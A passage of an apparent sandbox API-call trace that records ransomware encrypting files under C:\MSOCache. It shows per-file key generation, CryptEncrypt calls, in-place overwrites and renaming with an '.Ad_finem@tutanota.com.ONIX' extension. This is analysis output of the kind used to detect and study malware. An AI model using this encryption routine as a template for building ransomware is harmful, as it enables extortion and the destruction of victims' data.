cAlternateFileName="")) returned 1 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.626] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.626] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.626] GetLastError () returned 0x0 [0104.626] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.626] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.626] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2ed80, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.626] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.626] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.628] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.628] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.628] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.628] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.628] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", dwFileAttributes=0x80) returned 1 [0104.628] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 76 [0104.628] GetProcessHeap () returned 0x410000 [0104.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0104.628] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" [0104.628] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.628] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=191872) returned 1 [0104.628] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2ed80 [0104.629] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.629] GetProcessHeap () returned 0x410000 [0104.629] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.629] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.629] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.630] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.631] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2ed80) returned 0xf50048 [0104.633] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2ed80) returned 0xf7edd0 [0104.633] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.634] ReadFile (in: hFile=0x488, lpBuffer=0xf50048, nNumberOfBytesToRead=0x2ed80, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x2ed80, lpOverlapped=0x0) returned 1 [0104.638] SetFilePointer (in: hFile=0x488, lDistanceToMove=-191872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.639] WriteFile (in: hFile=0x488, lpBuffer=0xf7edd0*, nNumberOfBytesToWrite=0x2ed80, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf7edd0*, lpNumberOfBytesWritten=0x367f44c*=0x2ed80, lpOverlapped=0x0) returned 1 [0104.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0104.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf7edd0 | out: hHeap=0x410000) returned 1 [0104.641] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2ed80, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.641] CloseHandle (hObject=0x488) returned 1 [0104.642] GetProcessHeap () returned 0x410000 [0104.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.642] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.644] GetProcessHeap () returned 0x410000 [0104.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.645] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0104.645] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.645] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.645] GetLastError () returned 0x0 [0104.645] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.645] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.645] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6a3b, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.645] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.645] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.649] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.649] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.649] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.649] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.649] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", dwFileAttributes=0x80) returned 1 [0104.649] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 74 [0104.649] GetProcessHeap () returned 0x410000 [0104.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x467908 [0104.649] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" [0104.649] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.650] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=27195) returned 1 [0104.650] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6a3b [0104.650] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.650] GetProcessHeap () returned 0x410000 [0104.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.650] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.652] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.654] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.655] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a3b) returned 0x4d8b68 [0104.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a3b) returned 0x4df5b0 [0104.656] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.656] ReadFile (in: hFile=0x488, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x6a3b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x6a3b, lpOverlapped=0x0) returned 1 [0104.657] SetFilePointer (in: hFile=0x488, lDistanceToMove=-27195, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.657] WriteFile (in: hFile=0x488, lpBuffer=0x4df5b0*, nNumberOfBytesToWrite=0x6a3b, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4df5b0*, lpNumberOfBytesWritten=0x367f44c*=0x6a3b, lpOverlapped=0x0) returned 1 [0104.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4df5b0 | out: hHeap=0x410000) returned 1 [0104.659] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6a3b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.659] CloseHandle (hObject=0x488) returned 1 [0104.660] GetProcessHeap () returned 0x410000 [0104.660] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.660] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.662] GetProcessHeap () returned 0x410000 [0104.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.662] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0104.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.662] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.662] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.663] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.663] GetLastError () returned 0x0 [0104.663] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.663] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.663] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10676, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.663] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.663] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.665] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.665] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.665] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.665] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.665] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", dwFileAttributes=0x80) returned 1 [0104.665] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 73 [0104.665] GetProcessHeap () returned 0x410000 [0104.665] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0104.665] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" [0104.665] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.666] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=67190) returned 1 [0104.666] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10676 [0104.666] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.666] GetProcessHeap () returned 0x410000 [0104.666] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.666] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.666] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.667] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.668] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.669] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10676) returned 0x4d8b68 [0104.669] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10676) returned 0xf50048 [0104.670] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.671] ReadFile (in: hFile=0x488, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x10676, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x10676, lpOverlapped=0x0) returned 1 [0104.672] SetFilePointer (in: hFile=0x488, lDistanceToMove=-67190, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.672] WriteFile (in: hFile=0x488, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x10676, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x10676, lpOverlapped=0x0) returned 1 [0104.674] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.674] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0104.674] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10676, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.674] CloseHandle (hObject=0x488) returned 1 [0104.676] GetProcessHeap () returned 0x410000 [0104.676] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.676] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.678] GetProcessHeap () returned 0x410000 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.678] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.678] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.678] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.678] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.678] GetLastError () returned 0x0 [0104.678] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.678] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.679] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2488, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.679] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.679] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.680] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, 